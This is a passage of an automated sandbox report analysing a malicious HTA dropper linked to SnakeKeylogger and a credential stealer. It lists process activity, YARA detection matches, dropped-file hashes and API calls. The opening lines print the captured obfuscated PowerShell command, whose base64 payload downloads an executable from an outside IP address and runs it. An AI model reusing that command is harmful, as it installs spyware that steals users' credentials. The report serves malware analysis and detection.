U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: This is a third-party compiled AutoIt script.12_2_00E53B3A
                    Source: hkcmd.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: hkcmd.exe, 0000000C.00000000.1298701172.0000000000F04000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af4a8b8e-9
                    Source: hkcmd.exe, 0000000C.00000000.1298701172.0000000000F04000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3bd2d188-8
                    Source: hkcmd.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76067cf9-8
                    Source: hkcmd.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0d2bb10a-0
                    Source: hkcmd[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8b742fe2-2
                    Source: hkcmd[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d523e5b4-d
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hkcmd.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,12_2_00EBA1EF
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00EA8310
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00EB51BD
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E5E6A012_2_00E5E6A0
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7D97512_2_00E7D975
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E721C512_2_00E721C5
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E862D212_2_00E862D2
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00ED03DA12_2_00ED03DA
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E8242E12_2_00E8242E
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E725FA12_2_00E725FA
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E666E112_2_00E666E1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EAE61612_2_00EAE616
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E8878F12_2_00E8878F
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EB888912_2_00EB8889
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E8684412_2_00E86844
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00ED085712_2_00ED0857
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E6880812_2_00E68808
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7CB2112_2_00E7CB21
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E86DB612_2_00E86DB6
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E66F9E12_2_00E66F9E
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E6303012_2_00E63030
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7F1D912_2_00E7F1D9
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7318712_2_00E73187
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E5128712_2_00E51287
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7148412_2_00E71484
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E6552012_2_00E65520
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7769612_2_00E77696
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E6576012_2_00E65760
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7197812_2_00E71978
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E5FCE012_2_00E5FCE0
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00ED7DDB12_2_00ED7DDB
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E7BDA612_2_00E7BDA6
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E71D9012_2_00E71D90
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E63FE012_2_00E63FE0
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E5DF0012_2_00E5DF00
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_0146742012_2_01467420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_022327B913_2_022327B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0223C53013_2_0223C530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02232DD113_2_02232DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0223948013_2_02239480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0223C52113_2_0223C521
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0223946F13_2_0223946F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6613813_2_04F66138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6BC6013_2_04F6BC60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6AF0013_2_04F6AF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F689E013_2_04F689E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6F45813_2_04F6F458
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6F44813_2_04F6F448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6742813_2_04F67428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6741813_2_04F67418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6858813_2_04F68588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6857913_2_04F68579
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6452013_2_04F64520
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6450F13_2_04F6450F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6568013_2_04F65680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6566F13_2_04F6566F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6E75013_2_04F6E750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6E74013_2_04F6E740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6602A13_2_04F6602A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6F00013_2_04F6F000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6E18013_2_04F6E180
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6813013_2_04F68130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6812013_2_04F68120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F612AE13_2_04F612AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6522813_2_04F65228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6521A13_2_04F6521A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6033013_2_04F60330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6032013_2_04F60320
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F60CD813_2_04F60CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F67CD813_2_04F67CD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F67CC813_2_04F67CC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F64DD013_2_04F64DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F64DC013_2_04F64DC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6EFF013_2_04F6EFF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F66FD013_2_04F66FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F66FCD13_2_04F66FCD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6F8B013_2_04F6F8B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6F8A113_2_04F6F8A1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6788013_2_04F67880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6787113_2_04F67871
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6497813_2_04F64978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6496913_2_04F64969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F65AD813_2_04F65AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F65ACA13_2_04F65ACA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F60AB813_2_04F60AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6EBA813_2_04F6EBA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_04F6EB9813_2_04F6EB98
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exe D878F6AA5CC41DB62F6B2C3466CBEC5D792EAF8F77B2EA1E779E7925F267BE52
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\hkcmd.exe D878F6AA5CC41DB62F6B2C3466CBEC5D792EAF8F77B2EA1E779E7925F267BE52
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 00E78900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 00E70AE3 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: String function: 00E57DE1 appears 35 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/17@2/3
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBA06A GetLastError,FormatMessageW,12_2_00EBA06A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA81CB AdjustTokenPrivileges,CloseHandle,12_2_00EA81CB
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EA87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00EA87E1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EBB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,12_2_00EBB3FB
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00ECEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00ECEE0D
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,12_2_00EC83BB
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E54E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00E54E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\hkcmd[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3i2z1imp.evn.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 0000000D.00000002.2452508596.0000000002480000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.0000000002490000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2452508596.000000000249E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: shegivenmekissinglips.htaVirustotal: Detection: 42%
                    Source: shegivenmekissinglips.htaReversingLabs: Detection: 30%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\shegivenmekissinglips.hta"
